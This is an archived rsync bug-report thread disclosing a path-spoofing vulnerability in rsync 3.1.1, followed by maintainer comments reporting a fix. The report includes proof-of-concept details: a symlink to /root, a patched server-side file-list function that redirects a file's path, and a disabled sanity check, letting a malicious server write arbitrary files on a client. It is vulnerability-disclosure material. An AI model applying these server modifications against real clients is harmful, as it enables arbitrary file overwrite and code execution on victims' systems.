rsync - Dec 2014 - [Bug 10977] New: Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)

https://bugzilla.samba.org/show_bug.cgi?id=10977

            Bug ID: 10977
           Summary: Rsync path spoofing  attack  vulnerability (rsync
                    3.1.1 tested)
           Product: rsync
           Version: 3.1.1
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: critical
          Priority: P5
         Component: core
          Assignee: wayned at samba.org
          Reporter: gaojianfeng at baidu.com
        QA Contact: rsync-qa at samba.org

Created attachment 10471
  --> https://bugzilla.samba.org/attachment.cgi?id=10471&action=edit
Rsync path spoofing  attack  vulnerability (rsync 3.1.1 tested).pdf (Detailed
documentation)

Hi all    
    In newest version rsync(3.1.1),directly modify the file path into absolute
path is
not hijack succeed due to the security checks,but using symbolic links still
can bypass
security checks and spoofing client.When a client uses parameter -a to
synchronize 
files of the server-side(default),for example:

rsync -avzP  127.0.0.1::share   /tmp/share

Rsync recursive synchronous all files,An attacker can hijack the file path  by
modifying
the code of the server-side,allows remote  servers to write to arbitrary files,
and 
consequently execute arbitrary code .

Vulnerability  Details : 
    Firstly,i write a following file into the shared folder in rsync:a true
folder
 and a symbolic link are directed to the root directory .

[root at pentest rsync]# ls  -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root    6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir

Then enter the truedir folder, create a new file  name "pwned".

[root at pentest rsync]# cd  truedir/
[root at pentest truedir]# ls
[root at pentest truedir]# echo rsync  test  >  pwned
[root at pentest truedir]# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
[root at pentest truedir]# 

Next I modify the server to send the file code,in the process of
synchronizing,the path
of file "pwned" can be blocked and changed into any path.For example
as follow
code,change
true path  (truedir) to symbolic link (fakedir),this would put the Pwned file
to download
to the symbolic link  points to the address (fakedir -> /root/).
file: flist.c    line:394

static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
                const char *symlink_name, int symlink_len,
#endif
                int ndx, int first_ndx)
{
  if(strcmp(fname,"turedir/pwned") == 0){

      fname="fakedir/pwned";  // symbolic link 
//change  file  true path(truedir) to  symbolic link  (fakedir)
)
}

Then, verification occurs in the server-side and says "received request to
transfer
non-regular file fakedir/pwned.test 7 [sender]", But as an attacker, the
code
of the
server-side can be arbitrarily controlled,Shielding the following code.
file:rsync.c    line:405

/* if (iflags & ITEM_TRANSFER) {
        int i = ndx - cur_flist->ndx_start;
        if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
            rprintf(FERROR,
                "received request to transfer non-regular file: %d
[%s]\n",
                ndx, who_am_i());
            exit_cleanup(RERR_PROTOCOL);
        }
    }
*/

Vulnerability  Demo :

Online  test:
rsync -avvzP  106.185.33.114::yaseng   /tmp/yaseng

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

https://bugzilla.samba.org/show_bug.cgi?id=10977

Wayne Davison <wayned at samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |ASSIGNED

--- Comment #1 from Wayne Davison <wayned at samba.org> ---
The latest git now has a fix for this exploit in an inc-recursive transfer (the
default).  See commit: 962f8b90045ab331fc04c9e65f80f1a53e68243b

A transfer with --no-inc-recursive set (or an option that implies it) will sort
the filenames wrong, so it would take some more malicous-sender helper code to
deal with that, but it should be possible.  I'll be looking at how best to
deal
with that code path next.

-- 
You are receiving this mail because:
You are the QA Contact for the bug.

https://bugzilla.samba.org/show_bug.cgi?id=10977

Wayne Davison <wayned at samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|ASSIGNED                    |RESOLVED
         Resolution|---                         |FIXED

--- Comment #2 from Wayne Davison <wayned at samba.org> ---
The code now also fixes the --no-inc-recursive code, which resolves all aspects
of this issue.  I will release 3.1.2 soon.  Thanks for the report!

-- 
You are receiving this mail because:
You are the QA Contact for the bug.